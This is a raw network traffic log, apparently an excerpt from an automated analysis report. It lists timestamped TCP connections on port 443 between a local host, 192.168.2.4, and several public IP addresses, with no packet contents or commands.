                                                                                                                                    Nov 5, 2024 09:03:21.172534943 CET44349835162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.172549009 CET49835443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:21.172563076 CET49844443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:21.172591925 CET49835443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:21.172980070 CET44349835162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.173039913 CET49835443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:21.173368931 CET44349835162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.173415899 CET49835443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:21.187804937 CET49845443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:21.188803911 CET49842443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:21.202816010 CET49854443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:21.202816010 CET49848443192.168.2.4104.17.249.203
                                                                                                                                    Nov 5, 2024 09:03:21.205858946 CET49847443192.168.2.4104.17.249.203
                                                                                                                                    Nov 5, 2024 09:03:21.397135973 CET49847443192.168.2.4104.17.249.203
                                                                                                                                    Nov 5, 2024 09:03:21.397145987 CET44349847104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.397407055 CET49854443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:21.397422075 CET44349854162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.398350000 CET44349847104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.398415089 CET49847443192.168.2.4104.17.249.203
                                                                                                                                    Nov 5, 2024 09:03:21.398511887 CET44349854162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.398562908 CET49854443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:21.421293020 CET49848443192.168.2.4104.17.249.203
                                                                                                                                    Nov 5, 2024 09:03:21.421308041 CET44349848104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.421546936 CET49842443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:21.421559095 CET44349842162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.422342062 CET44349848104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.422398090 CET49848443192.168.2.4104.17.249.203
                                                                                                                                    Nov 5, 2024 09:03:21.422694921 CET44349842162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.467493057 CET49842443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:21.498394012 CET49845443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:21.498405933 CET44349845162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.498553038 CET49843443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:21.498578072 CET44349843162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.499032021 CET44349843162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.499579906 CET44349845162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.499639988 CET49845443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:21.501883984 CET49844443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:21.501898050 CET44349844162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.502934933 CET44349844162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.502994061 CET49844443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:21.516644001 CET49854443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:21.516736031 CET44349854162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.537081957 CET49842443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:21.537156105 CET44349842162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.541697979 CET49843443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:21.543665886 CET49843443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:21.543761015 CET44349843162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.543924093 CET49847443192.168.2.4104.17.249.203
                                                                                                                                    Nov 5, 2024 09:03:21.543998957 CET44349847104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.544059992 CET49848443192.168.2.4104.17.249.203
                                                                                                                                    Nov 5, 2024 09:03:21.544116020 CET44349848104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.545747042 CET49845443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:21.545802116 CET44349845162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.545990944 CET49844443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:21.546055079 CET44349844162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.546273947 CET49854443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:21.546288013 CET44349854162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.546369076 CET49842443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:21.548964977 CET49843443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:21.549010992 CET49847443192.168.2.4104.17.249.203
                                                                                                                                    Nov 5, 2024 09:03:21.549025059 CET44349847104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.549057007 CET49848443192.168.2.4104.17.249.203
                                                                                                                                    Nov 5, 2024 09:03:21.549071074 CET44349848104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.549123049 CET49845443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:21.549134970 CET44349845162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.549170017 CET49844443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:21.549184084 CET44349844162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.566375971 CET44349835162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.566435099 CET49835443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:21.567213058 CET44349835162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.567255974 CET44349835162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.567276955 CET49835443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:21.567289114 CET44349835162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.567302942 CET49835443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:21.567523956 CET44349835162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.567564964 CET44349835162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.567588091 CET49835443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:21.567595005 CET44349835162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.567609072 CET49835443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:21.568603992 CET4434984113.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.571425915 CET44349835162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.571480036 CET44349835162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.571497917 CET49835443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:21.571505070 CET44349835162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.571525097 CET44349835162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.571535110 CET49835443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:21.571578026 CET44349835162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.571578979 CET49835443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:21.571588993 CET44349835162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.571621895 CET49835443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:21.571631908 CET44349835162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.571672916 CET49835443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:21.571681976 CET44349835162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.571716070 CET49835443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:21.573761940 CET4434984613.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.574100971 CET4434985013.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.574425936 CET44349835162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.574495077 CET49835443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:21.574906111 CET4434985513.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.575035095 CET44349835162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.575073957 CET44349835162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.575083017 CET49835443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:21.575088024 CET44349835162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.575109959 CET49835443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:21.575676918 CET44349835162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.575711012 CET44349835162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.575722933 CET49835443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:21.575728893 CET44349835162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.575757027 CET49835443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:21.575790882 CET44349835162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.575829983 CET49835443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:21.577729940 CET44349853157.240.253.1192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.578150034 CET49853443192.168.2.4157.240.253.1
                                                                                                                                    Nov 5, 2024 09:03:21.578157902 CET44349853157.240.253.1192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.579118013 CET44349853157.240.253.1192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.579169035 CET49853443192.168.2.4157.240.253.1
                                                                                                                                    Nov 5, 2024 09:03:21.583058119 CET49853443192.168.2.4157.240.253.1
                                                                                                                                    Nov 5, 2024 09:03:21.583120108 CET44349853157.240.253.1192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.583753109 CET49853443192.168.2.4157.240.253.1
                                                                                                                                    Nov 5, 2024 09:03:21.583760023 CET44349853157.240.253.1192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.588685036 CET49854443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:21.588685036 CET49847443192.168.2.4104.17.249.203
                                                                                                                                    Nov 5, 2024 09:03:21.588686943 CET49848443192.168.2.4104.17.249.203
                                                                                                                                    Nov 5, 2024 09:03:21.588768959 CET49845443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:21.591327906 CET44349842162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.591334105 CET44349843162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.591916084 CET49855443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:21.591928959 CET4434985513.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.593017101 CET49855443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:21.593022108 CET4434985513.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.593669891 CET49841443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:21.593681097 CET4434984113.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.594225883 CET49841443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:21.594228983 CET4434984113.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.602343082 CET49844443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:21.613199949 CET49846443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:21.613219023 CET4434984613.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.613874912 CET49846443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:21.613882065 CET4434984613.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.614389896 CET49850443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:21.614408016 CET4434985013.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.614918947 CET49850443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:21.614923000 CET4434985013.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.615427017 CET49835443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:21.615437031 CET44349835162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.615803957 CET49861443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:21.615816116 CET44349861162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.615906954 CET49861443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:21.616760969 CET49861443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:21.616775990 CET44349861162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.634135008 CET49853443192.168.2.4157.240.253.1
                                                                                                                                    Nov 5, 2024 09:03:21.675134897 CET44349860162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.705426931 CET44349848104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.705513954 CET44349848104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.705558062 CET49848443192.168.2.4104.17.249.203
                                                                                                                                    Nov 5, 2024 09:03:21.706604004 CET44349843162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.706645966 CET44349843162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.706746101 CET49843443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:21.706769943 CET44349843162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.707206964 CET44349843162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.707241058 CET44349843162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.707252979 CET49843443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:21.707259893 CET44349843162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.707288027 CET44349843162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.707297087 CET49843443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:21.707302094 CET44349843162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.707334995 CET49843443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:21.707573891 CET44349843162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.709414005 CET44349854162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.709458113 CET44349854162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.709497929 CET44349854162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.709532022 CET44349854162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.709539890 CET49854443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:21.709553003 CET44349854162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.709575891 CET44349854162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.709575891 CET49854443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:21.709614038 CET44349854162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.709619999 CET49854443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:21.709625959 CET44349854162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.709709883 CET44349847104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.709731102 CET49854443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:21.709741116 CET44349854162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.709754944 CET44349842162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.709784985 CET44349847104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.709790945 CET44349842162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.709824085 CET44349842162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.709840059 CET49842443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:21.709841013 CET49847443192.168.2.4104.17.249.203
                                                                                                                                    Nov 5, 2024 09:03:21.709849119 CET44349842162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.709884882 CET49842443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:21.709887981 CET44349842162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.709898949 CET44349842162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.709928989 CET49842443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:21.709979057 CET44349845162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.709983110 CET44349842162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.710043907 CET44349845162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.710086107 CET49845443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:21.710459948 CET44349842162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.710489035 CET44349842162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.710530996 CET49842443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:21.710537910 CET44349842162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.710581064 CET49842443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:21.712551117 CET4434985613.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.714433908 CET44349844162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.714469910 CET44349844162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.714521885 CET49844443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:21.714529037 CET44349844162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.714555979 CET44349844162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.715871096 CET49844443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:21.725847006 CET4434985513.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.725977898 CET4434985513.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.726212025 CET49855443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:21.727617025 CET4434984113.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.727673054 CET4434984113.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.727744102 CET49841443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:21.727847099 CET49860443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:21.727861881 CET44349860162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.728261948 CET44349860162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.731015921 CET49860443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:21.731079102 CET44349860162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.731328011 CET49860443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:21.732290030 CET49856443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:21.732304096 CET4434985613.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.732876062 CET49856443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:21.732880116 CET4434985613.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.733117104 CET49855443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:21.733123064 CET4434985513.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.751837015 CET4434985013.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.751889944 CET4434985013.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.751956940 CET49850443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:21.753340960 CET4434984613.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.753469944 CET4434984613.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.755888939 CET49846443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:21.761461020 CET49843443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:21.761485100 CET44349843162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.761549950 CET49854443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:21.761558056 CET44349854162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.779336929 CET44349860162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.806477070 CET49841443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:21.806483984 CET4434984113.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.806499004 CET49841443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:21.806505919 CET4434984113.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.815929890 CET49843443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:21.815951109 CET49854443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:21.819500923 CET49850443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:21.819521904 CET4434985013.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.819662094 CET49850443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:21.819669008 CET4434985013.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.821923971 CET49846443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:21.821945906 CET4434984613.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.821962118 CET49846443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:21.821965933 CET4434984613.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.874476910 CET49862443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:21.874490023 CET4434986213.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.874579906 CET49862443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:21.887371063 CET49863443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:21.887398005 CET4434986313.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.887501001 CET49863443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:21.888626099 CET49864443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:21.888643026 CET4434986413.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.888876915 CET49864443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:21.913259029 CET49862443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:21.913268089 CET4434986213.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.913542986 CET49848443192.168.2.4104.17.249.203
                                                                                                                                    Nov 5, 2024 09:03:21.913552046 CET44349848104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.916539907 CET49847443192.168.2.4104.17.249.203
                                                                                                                                    Nov 5, 2024 09:03:21.916547060 CET44349847104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.933885098 CET49863443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:21.933901072 CET4434986313.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.935414076 CET49865443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:21.935437918 CET4434986513.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.935487986 CET49865443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:21.935777903 CET49865443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:21.935789108 CET4434986513.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.935878038 CET49864443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:21.935889959 CET4434986413.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.939261913 CET49845443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:21.939269066 CET44349845162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.939938068 CET49866443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:21.939956903 CET44349866162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.940268040 CET49866443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:21.940515995 CET49844443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:21.940522909 CET44349844162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.941030979 CET49867443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:21.941041946 CET44349867162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.941328049 CET49867443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:21.941900969 CET49868443192.168.2.4104.17.249.203
                                                                                                                                    Nov 5, 2024 09:03:21.941910982 CET44349868104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.942002058 CET49868443192.168.2.4104.17.249.203
                                                                                                                                    Nov 5, 2024 09:03:21.942642927 CET49869443192.168.2.4104.17.249.203
                                                                                                                                    Nov 5, 2024 09:03:21.942658901 CET44349869104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.942802906 CET49869443192.168.2.4104.17.249.203
                                                                                                                                    Nov 5, 2024 09:03:21.944458008 CET49866443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:21.944473982 CET44349866162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.944996119 CET49867443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:21.945010900 CET44349867162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.951939106 CET49868443192.168.2.4104.17.249.203
                                                                                                                                    Nov 5, 2024 09:03:21.951950073 CET44349868104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.952601910 CET49869443192.168.2.4104.17.249.203
                                                                                                                                    Nov 5, 2024 09:03:21.952621937 CET44349869104.17.249.203192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.994702101 CET49870443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:21.994718075 CET44349870162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.994868040 CET49870443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:21.995218039 CET49870443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:21.995223045 CET44349870162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:21.997750044 CET49871443192.168.2.4162.159.140.34
